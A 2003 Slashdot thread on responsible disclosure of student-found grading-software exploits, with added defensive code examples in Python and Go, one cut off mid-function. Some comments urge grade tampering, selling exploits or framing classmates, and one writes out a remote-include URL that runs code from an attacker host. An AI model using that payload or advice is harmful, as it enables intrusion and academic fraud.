Disclosure of Major Software Exploits by Students?

school-hacker asks: "I am a U.S. university student who has recently come across 2 remote exploits for a homework program used by colleges nationwide. Both vulnerabilities allow students to give themselves arbitrary scores, and possibly execute arbitrary code. To further emphasize the scope of this vulnerability, I have written and self-tested proof-of-concept exploit code. Naturally, I want to share this information with their software engineers, and would even be nice enough to suggest a means of fixing it. However, with the state of current intellectual property and reverse-engineering laws, I hesitate to do so out of fear of litigation or academic disciplinary action. As an ethical geek, what do -you- do?" While the responses from an earlier story might prove useful, there is always the possibility here of the university making things harder for the person reporting the problem. How can students avoid both legal and academic trouble when trying to notify their university of security problems?
  • by ramzak2k ( 596734 ) * on Thursday August 07, 2003 @09:41PM (#6641359)
    be an Anonymous Coward for a day!

    Still better, post the exploits here; we will make sure they come to know.
    • Re:the Slashdot way (Score:5, Informative)

      by The Old Burke ( 679901 ) on Thursday August 07, 2003 @09:58PM (#6641494)
      Or use hushmail.com
      Send the mail with exploit to abuse/contact/CEO@companywithexploit.com
      Tell them that you will release the exploit within 30/60/90 days on Bugtraq, Freenet and Slashdot unless they fix it.

      Make sure you also send the mail to:
      -Local/regional newspapers.
      -The school/school council/principal/teachers/newspaper.
      -Local government official(s).

      If they don't fix the shit after this, release the exploit *anonymously*.

      • by reynaert ( 264437 ) on Thursday August 07, 2003 @10:14PM (#6641594)
        Make sure you also send the mail to:

        -Local/regional newspapers.
        -The school/school council/principal/teachers/newspaper.
        -Local government official(s).
        Err, don't do that, unless as a last resort, if they don't fix the bug months after you've posted the exploit to bugtraq. You want them to fix the bug, not to sue you. Also remember you'll have to give up your anonymity before any of those three groups will listen to you.
        • Sending notice to third parties is INSURANCE. What local paper wouldn't love a feature story about the local school screwing over a smart, observant student who was only trying to help them? Sure beats covering the local dog show... again. This goes double for the STUDENT paper.
    • Release it to the public, anonymously.
      The problem will solve itself. :)

  • by Anonymous Coward on Thursday August 07, 2003 @09:42PM (#6641365)
    and help college students across America 'correct' their grades.

    Allah thanks you.
    • Remember the Kobayashi Maru? The no-win scenario?

      Kirk cheated.

      That's what I suggest be done here. If we can re-program the simulation to come out on top, I see no reason why we shouldn't get a commendation for original thinking.

      Kirk didn't like to lose. Neither should we.
  • Anon (Score:4, Interesting)

    by Rosonowski ( 250492 ) <rosonowski&gmail,com> on Thursday August 07, 2003 @09:42PM (#6641371)
    Your best bet is to do something similar to what you have done here. Submit the information to them via an anonymous channel, perhaps mailing a CD (which you handled using gloves, no less) with an explanation and machine-readable exploit code. You don't have to make it known that it was you, just that someone figured it out.
    • Re:Anon (Score:5, Funny)

      by gfody ( 514448 ) * on Thursday August 07, 2003 @09:55PM (#6641464)
      don't forget to include a hefty ransom, and instructions for where to leave the money in exchange for the "master" copy of the code. remember, no cops.
    • What is the goal? (Score:5, Insightful)

      by lpret ( 570480 ) <lpret42@NOspAm.hotmail.com> on Thursday August 07, 2003 @10:56PM (#6641819) Homepage Journal
      I would argue that there are several answers depending on the poster's goal. Is he interested in working for Blackboa...I mean, the software he is discussing (and/or any other company) and wanting to show his prowess? Or is it truly out of the kindness of his heart? Regardless, I would completely bypass the school. Contact the software company directly as they understand the issue better. It would be your luck that a random administrator at your school would hear about this and label you a h4x0r and a menace to society -- remember that people hate what they cannot understand.
      • by Czyl ( 696277 ) on Friday August 08, 2003 @01:25AM (#6642545)
        I concur wholeheartedly with the parent and caution you to be extremely cautious in going about this correctly. I work as a student lawyer of sorts at a major US university and defend students involved in disciplinary/judicial incidents with the university. Last year I represented a student who was ultimately expelled for exploring (not exploiting) severe security vulnerabilities on a campus library network with an eye to pointing out to someone higher-up that the school had massive holes in its architecture. Bureaucratic admins and faculty are hard-pressed to understand that the way to check system security is to carry out the same probes a h4xj0r would. My recommendations: 1) Cover your back. Document what you are doing and notify someone you trust (a faculty member in the CS department would be great) about your plans and benign intentions. 2) Contact the -company-, not the school, and notify them that you'll be issuing the exploit to BugTraq within a set time frame if the bug isn't corrected. Don't let your school even find out about this if you can help it. No need to be anonymous when contacting the company. They oughta thank you, really. 3) Publish the exploit on Slashdot unless the company specifically tells you why they cannot correct the problem during the set time frame. You don't even need to be anonymous. Legal action against security whistleblowers ought to be illegal, but at least here /.ers will die by the hundreds to defend you.
  • Give Yourself an A (Score:5, Interesting)

    by FreeUser ( 11483 ) on Thursday August 07, 2003 @09:43PM (#6641375)
    ... You've earned it. :-)

    Seriously, I'd take this slow. Perhaps writing something up in printed form and submitting it via snail mail would be smarter than having executable code lying around on a computer you own or have access to.
    • by Johnny Mnemonic ( 176043 ) <mdinsmore&gmail,com> on Thursday August 07, 2003 @09:53PM (#6641456) Homepage Journal

      Since you've done work for someone else--that they should be willing to pay for--I would argue that you should be compensated. However, I would also recommend legal counsel as to how you can present this offer without it sounding like extortion. And, even if you're willing to give it away, I would still seek said counsel--consider charging the application manufacturer only enough to cover your counsel.

      I would watch it, because you could certainly get into legal trouble--I believe that the Russian hackers mentioned a while back only wanted to work in IT, but made clumsy attempts to break into the field. It's easy to take a genuine offer as an extortion, although I think by rights you are due compensation.
      • As far as legal counsel goes, I think it would be both cheap (and kinda funny) if you use the free legal advice offered by the campuses themselves to determine a course of action.

        Nearly every campus has free legal advice consultation for students.
      • by bigsteve@dstc ( 140392 ) on Thursday August 07, 2003 @11:50PM (#6642112)
        Don't attempt to obtain compensation!
        • As the previous poster said, an attempt to solicit compensation from the software vendor for "work done" could constitute attempted extortion, and as such could be illegal.
        • Even if you do this in a legal way, you stand a good chance of being portrayed in the media as an evil money grubbing bastard.
        • If you get branded as evil, other people who are looking for exploits as a genuine public service will also tend to be "tarred with the same brush". That is likely to put them off doing this important work, which would be a BAD THING!!
        If you are nervous about the whole position, your best bet is to inform your school. (Do it in such a way that you don't give them any evidence they could use against you until you know that they will treat you fairly.)

        Your school has a vested interest in not having students hack the marking software they use. They won't want their grading schemes to be publicly called into question. They should also have the resources to deal with the question. If they decide to ignore the issue, they may get into legal trouble later on when they are sued by ex-students whose degrees have been "devalued".

    • by reynaert ( 264437 ) on Thursday August 07, 2003 @10:09PM (#6641560)
      Don't ever change your score, even if you give yourself a lower score, even if it's just for a demonstration. Any university will go berserk if a student does that, even if he acts in good faith.
    • How much would ppl pay to change a D to a B? Can you find everyone who got a D?
    • by shmert ( 258705 ) on Thursday August 07, 2003 @10:55PM (#6641818) Homepage
      No, give your arch nemesis an A+++ 150% average, then sit back and watch. Everything will sort itself out nicely.
    • by the_ed_dawg ( 596318 ) on Friday August 08, 2003 @12:50AM (#6642404) Journal
      Congratulations! You've just committed a major academic honesty offense! Do not pass go. Do not collect $200... and for damn sure, do not collect your diploma.

      Keep in mind that although you may not get caught, you might get even worse than caught. Any reputable college will likely set up an expulsion hearing for academic fraud. Even worse, in my home state (Arkansas), it is a class D felony to modify academic records at a higher institution. Actually, they busted a couple of people working in the transcript office for altering grades last fall at my college. w00t! H4x0r5 uN1T3!

    • by rf0 ( 159958 )
      I agree here. We know your heart is in the right place but other people might not see it like that. As long as you don't care about the fame and the glory, just make them aware of it then move on to something else.

      Rus
  • like the big boys (Score:2, Insightful)

    by Anonymous Coward
    duh : anonymous email with a threat to go public.

    Like the big boys do it.
    • by Archfeld ( 6757 ) *
      Have you NOT figured it out yet... THERE IS NO ANONYMOUS on the net... sorry guys, I assure you SOMEONE has logs: your ISP, the border routers along the way. If someone, say the government or a deep-pockets corp, wants that, they will pull an RIAA and get it. If you want to REALLY be anonymous, go to the library, use a typewriter, send a snail mail from another zip code and DON'T go into the post office to do it... otherwise just get a business license and approach them as a LICENSED contractor with a proposal.
      • by MillionthMonkey ( 240664 ) on Thursday August 07, 2003 @10:29PM (#6641678)
        Living in a police state doesn't have to be oppressive- it can be fun-pressive!

        The Internet offers no anonymity. So just print out the code on a locally connected printer (not a network printer). Wait until nightfall, then go to a conspicuous area on campus that is free of security cameras. Buy a can of spray paint (NOT online- that would be stupid!) and spray the working exploit code onto a wall of a building.

        Be sure to provide comments and please make sure the code compiles before you spray it.

        Then go home and throw your computer into a vat of nitric acid. And that's that!

      • Sure there is, do it like the spammers do -- find an open SMTP relay somewhere in China or Korea, and send it through there.

  • What to do (Score:4, Insightful)

    by tugfoigel ( 80286 ) on Thursday August 07, 2003 @09:43PM (#6641378)
    You could always try approaching your advisor or some other trusted faculty member.
    • Re:What to do (Score:3, Insightful)

      by Phattypants ( 469233 )
      Indeed, if you trust a faculty member implicitly you should approach them about it. Not just any faculty member now, go to one in the CS department or your equivalent. Another option would be to speak to someone who actually deals with campus network security, as they too will have a good deal of clout with the administration.

      Take it from someone who has been a computer lab assistant, technician, and web developer successively (that'd be me). IT faculty are pretty receptive to this kind of thing.

      Now if
  • by James A. A. Joyce ( 681634 ) on Thursday August 07, 2003 @09:43PM (#6641380) Journal
    ...anonymity is the key. My crystal ball (i.e. an application of Murphy's Law) states that if you try to formally inform the universities of the flaw, you'll get hushed up, blamed and generally blusted. Just write anonymous letters to the companies who develop the software and the universities about the problems. If they don't take action, then feel guiltfree about giving yourself arbitrary scores. Remember: if you don't get caught, it's not illegal.
    • by BJZQ8 ( 644168 ) on Thursday August 07, 2003 @10:01PM (#6641514) Homepage Journal
      I used to work for a school district that had major security problems with its grading system. They would tape passwords to the bottom of their keyboards...and put files with lists of teacher passwords in a publicly-accessible folder on the network. I attempted to tell my boss (who was getting paid $80,000 per year) about all of this, and was basically told it was not a big deal. I watched a student change his grade from D to B...and nobody ever knew. I told a few more people and was basically told to shut up...and I could feel their eyes turning to me as the problem. So I shut up...and it continues to this day. Just remember that with ultra-conservative computer administrative nazis, the nail that sticks up gets beat down.
  • The best approach to a security "evaluation" is to ask the admins responsible for permission first. This lets them know that "something" might be going on soon so if they detect your attempts they won't panic and send the cops to your house/dorm room.

    This also makes it obvious that you were really trying to help find/enhance security rather than just hacking into the system for your own benefit.
  • by kisielk ( 467327 ) on Thursday August 07, 2003 @09:44PM (#6641391)
    You send me the code.. and I will "examine" it to see if it would be legal. I'll get back to you about it after next semester? :D
  • Blackboard (Score:5, Informative)

    by zerocool^ ( 112121 ) on Thursday August 07, 2003 @09:44PM (#6641393) Homepage Journal
    This is probably having to do with "blackboard" software, i.e. learn.vt.edu [vt.edu].

    This software tries to be everything to everyone, and all most teachers use it for is posting grades.

    It doesn't surprise me that there are bugs in it, though. There have been several show up on astalavista.box.sk, and those were fixed, but the design of the program doesn't strike me as being particularly sound.

    ~Will
    • if blackboard (Score:3, Insightful)

      by ramzak2k ( 596734 ) *
      if it is about this blackboard [blackboard.com] software portal then it is a significant finding. The code is java based and I haven't come across a lot of exploits for java based architectures.
    • by Mobster75 ( 234793 ) on Thursday August 07, 2003 @10:26PM (#6641661) Homepage
      Sure, it's probably Blackboard which most colleges use, but if it's not Bb, it could also be Banner by SCT which plenty of schools also use.

      Compromising Banner is far more dangerous than Blackboard (Bb).... Most schools that use Banner use it as their student management system, which records official transcript, program requirements met, class registration, etc. etc.

      In my last undergrad semester, my team developed a website that interfaced directly w/ the Banner system and even found some loopholes in it which we exploited to allow our website to do a better job at calculating program requirements met and suggested offerings to complete it. (This was for an Advanced Software Project Mgmt class)

      Needless to say, the Registrars office people were very intrigued by our exploration into the limits of the current system. I imagine a less cooperative school administration would be more punitive.. (But I went to a business school, so they know we just get motivated by $$ ;) )

      • by calethix ( 537786 ) on Thursday August 07, 2003 @11:42PM (#6642078) Homepage
        I've found what I would consider security issues in Banner's web products before. Stuff that if you pass the correct variables to it, will display information from the database without doing any kind of user validation.
        To understand the issue, you have to know that it uses Oracle Application Server which basically lets you execute packages in the database. All of the main web packages do user validation but some of them call other packages to display the content of the page (which don't always do validation).
        So, if you know what variables to pass to said packages, you can bypass their security. SCT told me that since those were only supporting packages, they were functioning properly and they wouldn't do anything to change them.
        Granted, you have to have a pretty in depth knowledge of how their web products work but that's a good number of employees at any school using Banner. We have access to all of the package/program source so we can customize it for our university's needs.
        Oh well, I've ranted about SCT enough. :)
        What was funnier though was when I discovered that our database had execute any procedure granted to public, i.e. the web user. That essentially opened up any database procedure to be executed by an anonymous user via the web. I think that one was our fault instead of SCT's and it was fortunately taken care of fairly quickly.
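The two problems described in this comment (supporting packages that render data without re-checking the session, and a gateway that lets the web user call any procedure in the schema) combine into one bypass: call the supporting package directly. The following is an added example, not code from the thread or from SCT's product, modelling a PL/SQL-gateway style dispatcher in Python. The package names (`grades_pkg`, `render_pkg`), the session token and the student record are all constructed for the example.

```python
# Added example (not from the original thread): a miniature model of a
# PL/SQL-gateway style dispatcher, where the URL names a package.procedure
# and the gateway calls it. Package names, the session token and the
# student record are all constructed for this example.

STUDENTS = {"900123": {"name": "A. Student", "gpa": 3.4}}  # constructed data


def validate_session(params):
    """Model of the login check that the 'main' web packages perform."""
    return params.get("session") == "valid-session-token"  # constructed token


def grades_pkg_p_view_grades(params):
    """Main entry point: validates the session, then delegates rendering."""
    if not validate_session(params):
        return ("error", "login required")
    return render_pkg_p_show_student(params)


def render_pkg_p_show_student(params):
    """Supporting package: renders the record but does no validation itself."""
    rec = STUDENTS.get(params.get("sid"))
    return ("ok", rec) if rec else ("error", "no such student")


# Every procedure the web user can execute. With EXECUTE ANY PROCEDURE
# granted to PUBLIC this table is, in effect, the whole schema.
PROCEDURES = {
    "grades_pkg.p_view_grades": grades_pkg_p_view_grades,
    "render_pkg.p_show_student": render_pkg_p_show_student,
}


def dispatch_unsafe(path, params):
    """Gateway that calls whatever procedure the URL names."""
    proc = PROCEDURES.get(path)
    if proc is None:
        return ("error", "404 no such procedure")
    return proc(params)


# Procedures that are meant to be reachable from the web at all.
PUBLIC_ENTRY_POINTS = frozenset({"grades_pkg.p_view_grades"})


def request_validation(path):
    """Gateway-level allowlist: the job a request-validation hook does."""
    return path in PUBLIC_ENTRY_POINTS


def dispatch_hardened(path, params):
    """Same gateway, but internal packages can no longer be called directly."""
    if not request_validation(path):
        return ("error", "403 procedure not exposed")
    return dispatch_unsafe(path, params)


if __name__ == "__main__":
    # Direct call to the supporting package: no session needed in the unsafe gateway.
    print(dispatch_unsafe("render_pkg.p_show_student", {"sid": "900123"}))
    # Same request through the hardened gateway is refused before any code runs.
    print(dispatch_hardened("render_pkg.p_show_student", {"sid": "900123"}))
```

The point of the allowlist is that it is enforced at the gateway, before the database is touched, so it holds even when a supporting package forgets its own check; in a real mod_plsql deployment the equivalent knobs are the DAD's PlsqlRequestValidationFunction and PlsqlExclusionList settings. The second problem is a separate, one-line check: query `dba_sys_privs` for any privilege granted to `PUBLIC`, and revoke `EXECUTE ANY PROCEDURE` if it turns up.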
    • One of my best friends is one of the lead programmers for blackboard. So I would like to be extremely biased, and tell you that it can't be Blackboard that has issues!

      Can't we blame this on Microsoft somehow instead?


  • by GoofyBoy ( 44399 ) on Thursday August 07, 2003 @09:45PM (#6641399) Journal

    Find someone who will or is better able to the local student newspaper.

    Grab a reporter, show him it, let him follow up.
    • by reynaert ( 264437 ) on Thursday August 07, 2003 @10:04PM (#6641536)

      And you'll wind up with a very freaked out administration. What you want to do is to bring the problem to the attention of one of the techies that run the system, they might react sanely.

      What's even better is to send the developers an anonymous bug report (not from a university IP etc.), and, if they don't react, to BugTraq or another security list.

      You might also want to wait until you're graduated :)

    • That's exactly how Stefan Puffer got indicted in Houston, Texas last year. He provided a demonstration of an insecure county wireless system in front of a newspaper reporter and a county IT employee. He was later no-billed by the county but I'm sure his attorney's bill was a few $$$. -rick
  • What's in it for me? (Score:3, Interesting)

    by clovis ( 4684 ) on Thursday August 07, 2003 @09:46PM (#6641403)
    Go to a prof with your suspicions (but you don't know yet, how could you?) and get assigned to find out for one of your papers. You've already done the work, so it should be an easy grade.
    • Go to a prof with your suspicions (but you don't know yet, how could you?) and get assigned to find out for one of your papers. You've already done the work, so it should be an easy grade.

      Yeah, what he said. Do you have a prof that you respect & have a good relationship with? Hey, maybe thats a dumb question, but I went to a small school. Anyway, you can potentially turn it into a proof of knowledge in subject matter & get credit. Also, having a faculty member on your side should mitigate th

    • by Stuart Gibson ( 544632 ) on Friday August 08, 2003 @04:02AM (#6643074) Homepage
      get assigned to find out for one of your papers. You've already done the work, so it should be an easy grade
      And if it isn't, well, you know what to do.

      Goblin
  • I'd anonymously email the company that develops the software. Get a free hotmail account or some such and send them a full disclosure of the exploit with proof of concept code all in the body of a plain-text no attachment email.

    Hopefully it gets someone's attention, it gets patched, and admins at schools apply the patch. Will you get credit for your findings? No. Will you stand a chance at getting the hole fixed without any real fear of retribution? Yes.

    -----
  • Unfortunately (Score:3, Insightful)

    by interiot ( 50685 ) on Thursday August 07, 2003 @09:50PM (#6641431) Homepage
    Unfortunately the law is set up so that you're nearly as likely to get in trouble for reporting a problem as you are using it for personal gain, so from a cost-benefit perspective, one might argue that it's better to keep the secret for your own uses.
  • simple? (Score:5, Interesting)

    by jpellino ( 202698 ) on Thursday August 07, 2003 @09:51PM (#6641437)
    print it out 4x, put each in an envelope, no return address, send it to the provost, the IT head and the CEO and chief engineer of the company that makes this thing. demand nothing and tell them it's simply fyi. hard for four people to keep a secret - you'll get action somewhere. keep a copy in case nothing happens. no harm, no foul. it's just doing the right thing for no gain.
    • Re:simple? (Score:4, Funny)

      by robi2106 ( 464558 ) on Friday August 08, 2003 @12:30PM (#6646446) Journal
      While mailing the letters, do not ever handle the paper with your skin exposed so there is no chance of your fingerprints or DNA being deposited on the envelopes.

      Don't use your handwriting. Use a widely available laser printer, and a toner cartridge bought in a different state than the University involved. Purchase the envelope, paper, and toner cartridge with cash only. Do not keep any receipts.

      Mail the letters from a public drop box where no ATMs, drive-up windows, or gas stations are nearby so you don't accidentally get on a security camera. Mail the letters on a high volume day, preferably 4 days before a major holiday (Christmas, Easter, Mothers/Fathers Day, Valentines Day, Thanksgiving Day).

      In case a camera may catch you walking by (never drive to the mail box), buy large baggy clothes you don't normally wear (with cash of course) and a wig / facial hair for your trip to the mail box.

      Destroy the clothes either by burning them far out of town in a campfire (don't drive near the campfire, bury the ashes), or by throwing them away in separate dumpsters on separate days of the week, in separate towns (preferably towns that do not send their trash to the same landfill).

      If you take these precautions then you should be ok.

      That or just don't mail the notifications.

      robi
  • by meshko ( 413657 ) on Thursday August 07, 2003 @09:51PM (#6641438) Homepage
    you go to slashdot and brag about it.
  • Suggestion #1 (Score:5, Insightful)

    by sabNetwork ( 416076 ) on Thursday August 07, 2003 @09:52PM (#6641447)
    You choose a different nickname from "school-hacker" :-)
  • $.02 (Score:4, Funny)

    by Alien Being ( 18488 ) on Thursday August 07, 2003 @09:53PM (#6641455)
    Tell them that you know how to do it and refuse to give them the details unless they can provide you with federal, state and local documents guaranteeing that you, your friends, and your family will not be prosecuted now or in the future for any illegal activity relating to this exploit, exploits of other academic software, or exploits of any software relating to anyone who ever attended college or anyone who knows someone who attended college. Be sure to specify that Arab Americans cannot be excluded from these guarantees.

    Also demand that the school indemnify you against any civil actions. While you're at it, you might as well require a statement that no military action will be taken.

    Finally, offer them your consulting services at $500/hr, minimum 10 hours.

    Disclaimer: IANAL, BIPOOSD (but I play one os /.)

  • ...use it to your advantage, muhahahaha!
  • ...change your grade to give yourself an "A" in gym
    • I thought the idea here was keeping a low profile? God knows that anyone finding security holes in university software doesn't stand a snowball's chance in hell of scoring an A in gym. Think before you say these things, Mitch. Twenty points higher than me and he thinks a guy like that can ace gym?
  • As much as I would love to say go tell someone and show that there is a fault, just the fact that you know about it might implicate you and make any of your marks suspect. University bureaucracies are known for making stupid decisions.

    If you can send something anonymously then I think you have done what you can.
    Don't jeopardize your future over a good deed.

    Also: what do you have to gain, aside from some kudos? You have far more to lose if someone takes what you do the wrong way.

    Remember: Good deeds
  • The standard way. (Score:3, Informative)

    by Popsikle ( 661384 ) on Thursday August 07, 2003 @09:54PM (#6641461) Homepage
    Being a member of the security scene (not a very skilled member but I'm tryin! ;) ) The standard way would be to email the vendor. If you want to do it anonymously pm me and I can set you up a POP3 account ;) Briefly state the issues, and the holes, how the exploit works, and inform them that if no response is made you will forward the exploit and the security brief to the proper mailing lists. It is law in California now that any security breach must be made public so just remind them of that. Normally they will respond asking for further details; forward them your proof-of-concept and again warn them if corrective measures are not made you will announce it publicly. It should result in a patch, in which case make your findings public with information on how to patch or where to obtain the patch for the software. If all communications fail there are the [FULL-DISCLOSURE] and the [INCIDENTS] mailing lists. Again if you are worried about your school and/or IP laws the best thing would be to spoof an email to the lists (if it comes down to that) or use an email account that your name IS NOT attached to. Most companies will thank you for informing them before going public, and it is the right thing to do =) Also try digging thru your AUP and TOS for the network at school; in there it may state some legalities about breaking into systems, hacking, sniffing, etc. If all else fails, forward your finding to a trusted source, and have them take the actions required. Remember you are not required by any law to make your findings public, so if you really feel uneasy just forget about the whole thing.
  • You could always pull a frame-up and have it look like a group of students pulled off the exploit. Or find someone that you really don't like, who doesn't like you, drop down your grades and accuse them of tampering with them.

    In all seriousness we live in such a paranoid culture that there isn't really a right answer that anyone can give you. It's nice to see that someone out in America has a conscience but my paranoid mind is telling me that if a student came over and told me that there were exploits in the
  • I'm not a student anymore, and I could give a crap.. My company could use the press. go to my web site (in my sig), my address is listed. (424 S. Division Chenoa, IL 61726) send me a CD via snail mail, I'll copy it, destroy the original and contact the company in question.
  • Consult your AUP (Score:5, Interesting)

    by rainmanjag ( 455094 ) <joshg@@@myrealbox...com> on Thursday August 07, 2003 @09:57PM (#6641485) Homepage
    Most universities have a well-published Acceptable Use Policy. Before making any disclosures, become intimately familiar with this document. As long as you've done nothing to compromise this document, you should be on safe ground.

    What would be their concern in punishing you? To dissuade every wanna-be cracker on campus from poking around the innards of the computer network. Though we all know security through obscurity does not work, your school does not want everybody trying to eliminate that obscurity.

    When you compose your statement of disclosure, include a statement which argues for your concern and your compliance with the AUP. Cite it, quote it, and argue for your concern for staying within the published regulations of the University. So long as you have not used this exploit to your advantage and so long as you show concern for the things they are concerned about, you should be fine.

    -jag
  • Three things (Score:5, Interesting)

    by Shoten ( 260439 ) on Thursday August 07, 2003 @09:59PM (#6641498)
    One, don't notify the university directly. If you do, you create a political situation where they still have the ability to shut you up by putting pressure on you. Keep in mind, the university wouldn't make life hard for you because they're run by Darth Vader, they'd make life hard for you to keep you from disclosing.

    Two, do notify the vendor, BUT use the disclosure guidelines provided by Rain Forest Puppy (called RFPolicy). This is the best template for fair and equitable disclosure I've ever seen, and I feel it's even a hair better than the policy put forth by @Stake (although theirs is pretty good too). Set up a hushmail account that cannot be traced back to you for this purpose, and proceed from there.

    Three, do NOT disclose the proof-of-concept exploit code. Disclosing a vulnerability is enough, there is no reason to automate attacks that take advantage of it.

    By the time the university knows anything, they will no longer be able to accomplish anything by making your life hard. Furthermore, you will be in a position of strength, having taken the high road in disclosure and given all parties every opportunity to protect themselves properly.

  • by burtonator ( 70115 ) on Thursday August 07, 2003 @09:59PM (#6641500)
    I had this problem a while back with java.sun.com.

    They were running a comment system that did server side includes. The URL pattern was

    http://java.sun.com/foo.jsp?url=relative/path.inc

    The obvious hack would be to enter a file: URL and see if it worked and sure enough I could browse through the whole file system as long as I knew the path.

    Stupid Java engineers.

    Anyway... I contacted a few VPs at SUN and just told them that I had discovered a severe security hole in their webserver and that because of the DMCA I couldn't report it.

    They were quick to respond telling me that they WOULDN'T prosecute if i were to give them the security disclosure so they could fix the issue.

    Most people won't care as long as you are white hat. If they freak out then don't reveal the information

    Kevin
    • by Anonymous Coward
      They were running a comment system that did server side includes. The URL pattern was

      http://java.sun.com/foo.jsp?url=relative/path.inc


      I'm not sure if this was the case here, but this can be far more dangerous in some cases, since you can do off-server includes (in PHP at least).

      This means you could do something like:

      http://java.sun.com/foo.jsp?url=http://www.hax0r-site.com/mycode.inc

      And it would execute "mycode.inc" on their server, meaning you could run *arbitrary* code on their server.
    • Been the coder (Score:3, Interesting)

      by phorm ( 591458 )
      I accidentally left a hole like this on a server I was working with once. I'd actually had checks to ensure such a thing didn't happen, but disabled them when I was debugging and forgot to uncomment the code (dumb dumb dumb). Luckily, that particular server didn't have anything overly special, though the ability to view users in the passwd file (which contained fullnames) was annoying.

      I must say that I greatly appreciated when somebody informed me of the hole, though I felt like an idiot afterwards. Not e
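The bug in the two comments above is an include parameter that accepts any path or URL. As an added example (not code from Sun, phorm or this thread), here is the kind of allowlisting check phorm says he had disabled, written in Go; the function name resolveInclude and the root directory /srv/includes are assumptions.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// ErrBadInclude is returned for any include target that is not a plain
// relative .inc file inside the configured include root.
var ErrBadInclude = errors.New("include target rejected")

// resolveInclude maps the user-controlled "url" query parameter to a file
// path under includeRoot, or rejects it. Hypothetical helper for this example.
func resolveInclude(includeRoot, param string) (string, error) {
	// Anything carrying a scheme ("file:", "http:", "https:", ...) or a
	// "//" authority is a URL, not a relative path, and is rejected outright.
	if strings.Contains(param, ":") || strings.Contains(param, "//") {
		return "", ErrBadInclude
	}
	// Absolute paths, Windows separators and embedded NULs are never valid.
	if strings.HasPrefix(param, "/") || strings.Contains(param, "\\") ||
		strings.ContainsRune(param, 0) {
		return "", ErrBadInclude
	}
	// Only the one extension the include system is meant to serve.
	if !strings.HasSuffix(param, ".inc") {
		return "", ErrBadInclude
	}
	root := filepath.Clean(includeRoot)
	// Join cleans the result, so "a/../../x.inc" collapses before the check.
	target := filepath.Join(root, param)
	// The resolved path must stay strictly below root: Rel must not climb out.
	rel, err := filepath.Rel(root, target)
	if err != nil || rel == "." || rel == ".." ||
		strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrBadInclude
	}
	// Symlinks inside root are not resolved here; on a real filesystem apply
	// filepath.EvalSymlinks to target and repeat the Rel check.
	return target, nil
}

func main() {
	// Constructed inputs modelled on the URL pattern quoted in the thread.
	for _, p := range []string{
		"relative/path.inc",
		"file:///etc/passwd",
		"http://www.hax0r-site.com/mycode.inc",
		"../../etc/passwd.inc",
	} {
		if t, err := resolveInclude("/srv/includes", p); err != nil {
			fmt.Printf("%-40q -> rejected\n", p)
		} else {
			fmt.Printf("%-40q -> %s\n", p, t)
		}
	}
}
```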
  • so be careful. Maybe you better just send them 699.99 right now to cover yourself. Then you'll be free to do what you want with it, without the fear of litigation.
  • by linuxislandsucks ( 461335 ) on Thursday August 07, 2003 @10:00PM (#6641506) Homepage Journal
    Here is some advice..

    Remember you will be dealing with two or three groups that have different motives for their existence; i.e. the IT group of your college, college Management, and the software vendor...

    You do not have enough power or pull to report this on your own and should not do so as it would put your college studies in danger, heed this warning!

    What you need to do is find a tenured CS faculty member that will be a guinea pig for a blind computer experiment..blind in that he or she does not know ahead of time the directions you will be giving..

    The directions must be in the form of question of:

    What happens if I do this what will occur..in other words you are leading the faculty member on the trail of discovery..

    Once they get to the end it is then their responsibility for reporting the security hack and thus your college studies are protected..

  • by russotto ( 537200 ) on Thursday August 07, 2003 @10:01PM (#6641511) Journal
    If history is any guide: They aren't going to take you seriously unless you release a working exploit. If you tell 'em about it they'll just try to silence you with threats -- and then you can't choose anonymous release, because they'll go after you.

    If you release the exploit anonymously, you'll get things fixed. If you release it with your name attached, you'll get things fixed and bring a shitstorm down on your head -- your choice if you want the notoriety and its consequences.
  • And packetstorm, of course.

    -Adam
  • by Ryan Amos ( 16972 ) on Thursday August 07, 2003 @10:01PM (#6641517)
    You should forget about the whole thing. There is no good that can come of this. I understand wanting to be a good Samaritan and all, but some people just don't take kindly to that. Considering the risks here (if the company gets pissed off at you, you end up with a computer crimes charge on your record and are basically blacklisted from the industry) I'd say you should delete any copies of any proof-of-concept code you have and forget about the whole thing. Either that or sell it to a fraternity or the football/basketball program at your school.. I'm sure they'd LOVE to get their hands on something like that.
  • by Dragon218 ( 139996 ) on Thursday August 07, 2003 @10:01PM (#6641518) Homepage
    I need to pass this semester. Don't ruin this for me.
  • by BelugaParty ( 684507 ) on Thursday August 07, 2003 @10:03PM (#6641533)
    Maybe I'm completely naive, but what the hell is going on?! Has everyone on slashdot hacked or cracked some 31337 prog/dbase/bank ... Why is anonymity supposedly the best policy?! As long as you haven't changed your grades or exploited code (your teachers/the school will be able to tell) then you'll be fine. Are you afraid of getting busted for something else? I mean, it seems completely rational to e-mail the company, print a copy, mail it to yourself (if you are as paranoid as everyone else) and then, if problems arise, mail the university.

    Remember: The university cares about a student paying 20k+ a year to be there, the software company is costing the U money, who would they rather attack?

    Anonymity is for spammers. You'll probably get some recognition in the CS department if you say something about it... unless your teachers are all secretly black hat, and hate your guts for exposing yourself .. :P ridiculous
  • by PseudononymousCoward ( 592417 ) on Thursday August 07, 2003 @10:05PM (#6641538)
    Is there a professor that you know well enough to approach about this? I would tell them the facts and ask them what to do.

    It is highly likely that they will be willing to approach the PTB about the issue--leaving you entirely out of it. At most universities, such a software vendor won't try to get your identity from a prof, they know where their bread is buttered.

    If all else fails, drop me an email at roberts period six-two-eight period osu period edu. I'm a prof at Ohio State and I'll be happy to lend a hand.

  • by MalleusEBHC ( 597600 ) on Thursday August 07, 2003 @10:06PM (#6641545)
    A lot of people here have advocated alerting people about this anonymously. Whether or not you feel this is the correct thing to do, consider including a PGP public key with whatever submissions you turn over to relevant parties. This way, if it becomes advantageous at a later time to take credit for your actions, you can prove that you were the anonymous whistle-blower.
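One way to set that up, as an added example rather than anything from the comment or the thread: the reporter ships the public key and a signature with the report, and can later prove authorship by answering a fresh challenge under the same key. Go's standard-library ed25519 stands in here for a PGP key; the type and function names are assumptions.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"encoding/hex"
	"fmt"
)

// Reporter holds the keypair the anonymous whistle-blower keeps to themselves.
type Reporter struct {
	pub  ed25519.PublicKey
	priv ed25519.PrivateKey
}

// NewReporter generates a fresh keypair used for nothing but this disclosure,
// so the key cannot be linked to any existing identity.
func NewReporter() (*Reporter, error) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
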